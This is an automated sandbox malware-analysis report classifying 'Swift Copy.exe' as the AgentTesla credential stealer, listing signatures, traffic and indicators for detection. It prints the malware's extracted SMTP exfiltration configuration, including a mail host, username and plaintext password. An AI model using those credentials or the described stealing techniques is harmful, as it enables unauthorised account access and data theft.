Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample name:Swift Copy.exe
Analysis ID:1483051
MD5:2ad0a14a883597c8707276c3002d85da
SHA1:5840f94ca6dc35f3e48f7e0586e3a9724fb566d0
SHA256:c7dc84187ebfc4521a3fe173e5b59850c753251a1a935b294c0a6fb63d6c9315
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Swift Copy.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\Swift Copy.exe" MD5: 2AD0A14A883597C8707276C3002D85DA)
    • RegSvcs.exe (PID: 2840 cmdline: "C:\Users\user\Desktop\Swift Copy.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mahesh-ent.com", "Username": "info@mahesh-ent.com", "Password": "M@hesh3981"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x33e6d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x33edf:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x33f69:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x33ffb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x34065:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x340d7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x3416d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x341fd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Swift Copy.exe.ee0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Swift Copy.exe.ee0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.Swift Copy.exe.ee0000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3206d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x320df:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x32169:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x321fb:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x32265:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x322d7:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3236d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x323fd:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 4 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 148.66.136.151, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 2840, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49731
                    No Snort rule has matched
                    Timestamp:2024-07-26T15:12:33.296540+0200
                    SID:2855542
                    Source Port:49739
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:13.755916+0200
                    SID:2840032
                    Source Port:49748
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:11:56.171178+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49738
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:11:17.788023+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49732
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:12:30.761942+0200
                    SID:2840032
                    Source Port:49731
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:11:04.562261+0200
                    SID:2855542
                    Source Port:49731
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:30.681219+0200
                    SID:2840032
                    Source Port:49744
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:01.501242+0200
                    SID:2840032
                    Source Port:49742
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:51.697303+0200
                    SID:2840032
                    Source Port:49757
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:30.674764+0200
                    SID:2855542
                    Source Port:49744
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:33.795058+0200
                    SID:2840032
                    Source Port:49751
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:51.690852+0200
                    SID:2855542
                    Source Port:49757
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:33.786282+0200
                    SID:2855542
                    Source Port:49751
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:14:13.749702+0200
                    SID:2855542
                    Source Port:49748
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:12:33.303757+0200
                    SID:2840032
                    Source Port:49739
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:47.556689+0200
                    SID:2840032
                    Source Port:49746
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:47.550653+0200
                    SID:2855542
                    Source Port:49746
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-26T15:13:01.495219+0200
                    SID:2855542
                    Source Port:49742
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.mahesh-ent.com", "Username": "info@mahesh-ent.com", "Password": "M@hesh3981"}
                    Source: Swift Copy.exeReversingLabs: Detection: 64%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Swift Copy.exeJoe Sandbox ML: detected
                    Source: Swift Copy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: Swift Copy.exe, 00000000.00000003.1671012395.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000003.1670003411.0000000003C00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Swift Copy.exe, 00000000.00000003.1671012395.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000003.1670003411.0000000003C00000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDBBE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE68EE FindFirstFileW,FindClose,0_2_00DE68EE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE698F
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD076
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD3A9
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9642
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE979D
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9B2B
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5C97
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 148.66.136.151:587
                    Source: Joe Sandbox ViewIP Address: 148.66.136.151 148.66.136.151
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.4:49731 -> 148.66.136.151:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DECE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DECE44
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.mahesh-ent.com
                    Source: RegSvcs.exe, 00000001.00000002.4142550881.0000000003626000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003757000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003583000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.000000000335A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.00000000034AB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003710000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003394000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.00000000035BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mahesh-ent.com
                    Source: RegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Swift Copy.exe, 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Swift Copy.exe, 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4137346233.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000001.00000002.4142550881.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49730 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, 3DlgK9re6m.cs.Net Code: S8rY0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEAFF
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DEED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00DEED6A
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DEEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00DEEAFF
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00DDAA57
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00E09576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E09576

                    System Summary

                    barindex
                    Source: 0.2.Swift Copy.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: Swift Copy.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Swift Copy.exe, 00000000.00000000.1660132964.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3e411b6e-7
                    Source: Swift Copy.exe, 00000000.00000000.1660132964.0000000000E32000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_447c8b08-e
                    Source: Swift Copy.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2a6f1bf7-0
                    Source: Swift Copy.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_04ca0195-b
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00DDD5EB
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00DD1201
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DDE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00DDE8F6
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE20460_2_00DE2046
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D780600_2_00D78060
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD82980_2_00DD8298
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DAE4FF0_2_00DAE4FF
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DA676B0_2_00DA676B
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00E048730_2_00E04873
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D7CAF00_2_00D7CAF0
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D9CAA00_2_00D9CAA0
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D8CC390_2_00D8CC39
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DA6DD90_2_00DA6DD9
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D791C00_2_00D791C0
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D8B1190_2_00D8B119
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D913940_2_00D91394
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D917060_2_00D91706
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D9781B0_2_00D9781B
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D919B00_2_00D919B0
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D8997D0_2_00D8997D
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D779200_2_00D77920
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D97A4A0_2_00D97A4A
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D97CA70_2_00D97CA7
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D91C770_2_00D91C77
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DA9EEE0_2_00DA9EEE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DFBE440_2_00DFBE44
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D7BF400_2_00D7BF40
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D91F320_2_00D91F32
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00ED36200_2_00ED3620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0304E2B81_2_0304E2B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_030441D01_2_030441D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_03044AA01_2_03044AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_03043E881_2_03043E88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_0304A9801_2_0304A980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C565D01_2_06C565D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C555881_2_06C55588
